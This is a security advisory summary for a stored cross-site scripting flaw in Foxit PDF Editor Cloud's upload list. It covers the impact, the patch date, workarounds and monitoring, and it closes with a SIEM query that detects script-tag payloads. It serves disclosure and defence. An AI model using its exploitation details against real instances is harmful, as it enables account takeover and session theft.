CVE-2026-1591
📋 TL;DR
Foxit PDF Editor Cloud (pdfonline) has a stored cross-site scripting vulnerability in its file upload feature. Malicious usernames embedded in uploaded files aren't properly escaped, allowing attackers to execute arbitrary JavaScript when administrators view the upload list. This affects all users of pdfonline.foxit.com before February 3, 2026.
💻 Affected Systems
- Foxit PDF Editor Cloud (pdfonline)
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, perform actions as administrators, deface the application, or redirect users to malicious sites, potentially leading to complete account compromise and data theft.
Likely Case
Attackers would typically use this to steal session cookies or credentials from administrators viewing the upload list, gaining unauthorized access to the PDF Editor Cloud platform.
If Mitigated
With proper input validation and output encoding, the malicious JavaScript would be rendered harmless as plain text rather than executed.
🎯 Exploit Status
Exploitation requires file upload access and an administrator to view the upload list. The vulnerability is straightforward to exploit once discovered.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2026-02-03 or later
Vendor Advisory: https://www.foxit.com/support/security-bulletins.html
Restart Required: No
Instructions:
1. Access the Foxit PDF Editor Cloud admin panel. 2. Check current version in system settings. 3. If before 2026-02-03, contact Foxit support for update. 4. Verify update to 2026-02-03 or later.
🔧 Temporary Workarounds
Disable file uploads
allTemporarily disable the file upload feature until patched
Content Security Policy
allImplement strict Content Security Policy headers to block inline JavaScript execution
Content-Security-Policy: script-src 'self'
🧯 If You Can't Patch
- Implement WAF rules to block XSS payloads in file upload metadata
- Restrict file upload permissions to trusted users only and monitor upload logs
🔍 How to Verify
Check if Vulnerable:
Check if your pdfonline.foxit.com instance is dated before 2026-02-03 in the admin panel or system infoCheck Version:
Check admin panel system information or contact Foxit supportVerify Fix Applied:
Confirm version is 2026-02-03 or later and test file upload with XSS payloads to ensure they're properly escaped📡 Detection & Monitoring
Log Indicators:
- Unusual file uploads with script tags in metadata
- Multiple failed upload attempts with special characters
Network Indicators:
- HTTP requests with script payloads in file upload parameters
SIEM Query:
source="pdfonline" AND (event="file_upload" AND (message="*<script>*" OR message="*javascript:*"))